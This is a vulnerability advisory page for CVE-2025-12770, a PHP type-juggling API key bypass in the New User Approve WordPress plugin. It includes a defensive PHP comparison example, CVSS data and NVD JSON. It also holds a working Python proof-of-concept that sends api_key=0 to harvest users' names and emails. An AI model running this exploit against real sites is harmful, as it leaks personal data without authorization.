Security Vulnerability Report
CVE-2025-12770 CVSS 5.3 MEDIUM

CVE-2025-12770

Published: 2025-11-19 04:16:05
Last Modified: 2026-04-15 00:35:42

Description

The New User Approve plugin for WordPress is vulnerable to unauthorized data disclosure in all versions up to, and including, 3.0.9 due to insufficient API key validation using loose equality comparison. This makes it possible for unauthenticated attackers to retrieve personally identifiable information (PII), including usernames and email addresses of users with various approval statuses via the Zapier REST API endpoints, by exploiting PHP type juggling with the api_key parameter set to "0" on sites where the Zapier API key has not been configured.
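The comparison bug the description refers to, shown as an added illustration that is not the plugin's own code. It assumes the stored key is read with WordPress get_option(), which returns false for an option that was never set; the function names and the sample keys are made up.

```php
<?php
// Illustrative reconstruction of the bug class behind CVE-2025-12770.
// Not the plugin's code: function names, option handling and keys are assumed.

// Loose check (vulnerable pattern). When the Zapier key was never configured,
// get_option() yields false, and in PHP `"0" == false` is true because the
// string "0" converts to boolean false. A request carrying api_key=0 therefore
// passes on a site that has no key at all.
function check_api_key_loose($stored_key, $provided_key) {
    return $stored_key == $provided_key;
}

// Hardened check: deny outright when no key is configured, require a string
// on both sides, and compare with hash_equals() (strict and constant-time).
function check_api_key_strict($stored_key, $provided_key) {
    if (!is_string($stored_key) || $stored_key === '') {
        return false;   // integration not configured: nothing may authenticate
    }
    if (!is_string($provided_key)) {
        return false;   // reject arrays/null from query parsing
    }
    return hash_equals($stored_key, $provided_key);
}

// Constructed cases: [value returned by get_option(), api_key parameter, label]
$cases = [
    [false,    '0',      'key not configured, api_key="0"'],
    [false,    'abc',    'key not configured, api_key="abc"'],
    ['s3cret', 's3cret', 'key configured, correct key'],
    ['s3cret', '0',      'key configured, api_key="0"'],
];

foreach ($cases as [$stored, $provided, $label]) {
    printf("%-38s loose=%s strict=%s\n",
        $label,
        check_api_key_loose($stored, $provided) ? 'PASS' : 'deny',
        check_api_key_strict($stored, $provided) ? 'PASS' : 'deny');
}
```

Run it with the PHP CLI to see the loose check accept the unconfigured-key case while the strict check accepts only the correct configured key.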

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

New User Approve WordPress plugin, all versions <= 3.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-12770 PoC
# New User Approve Plugin - API Key Validation Bypass
# Affects: New User Approve <= 3.0.9

target_url = "http://target-wordpress-site.com"

# Step 1: Identify Zapier REST API endpoint
api_endpoint = f"{target_url}/wp-json/new-user-approve/v1/users"

# Step 2: Exploit the type juggling vulnerability
# Send api_key="0" to bypass authentication
payload = {
    "api_key": "0"
}

print("[*] Attempting to exploit CVE-2025-12770...")
print(f"[*] Target: {api_endpoint}")

try:
    # Make request with api_key="0"
    response = requests.get(api_endpoint, params=payload, timeout=10)
    print(f"[*] Status Code: {response.status_code}")

    if response.status_code == 200:
        data = response.json()
        print("[+] SUCCESS! Authentication bypassed!")
        print("[+] Retrieved user data:")
        print(json.dumps(data, indent=2))

        # Extract PII information
        if isinstance(data, list):
            for user in data:
                if isinstance(user, dict):
                    username = user.get('user_login', user.get('username', 'N/A'))
                    email = user.get('user_email', user.get('email', 'N/A'))
                    status = user.get('status', 'N/A')
                    print(f" - Username: {username}, Email: {email}, Status: {status}")
    else:
        print(f"[-] Failed. Status: {response.status_code}")
        print(f"[-] Response: {response.text[:200]}")

except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

print("\n[*] Note: This PoC only works on sites where Zapier API key is not configured.")

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12770",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-19T04:16:04.920",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The New User Approve plugin for WordPress is vulnerable to unauthorized data disclosure in all versions up to, and including, 3.0.9 due to insufficient API key validation using loose equality comparison. This makes it possible for unauthenticated attackers to retrieve personally identifiable information (PII), including usernames and email addresses of users with various approval statuses via the Zapier REST API endpoints, by exploiting PHP type juggling with the api_key parameter set to \"0\" on sites where the Zapier API key has not been configured."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/new-user-approve/tags/3.0.9/includes/zapier/includes/rest-api.php#L104",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/new-user-approve/tags/3.0.9/includes/zapier/includes/rest-api.php#L40",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/new-user-approve/trunk/includes/zapier/includes/rest-api.php#L104",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3f1cf77a-64b4-405b-adcb-ef16d9e82ab2?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}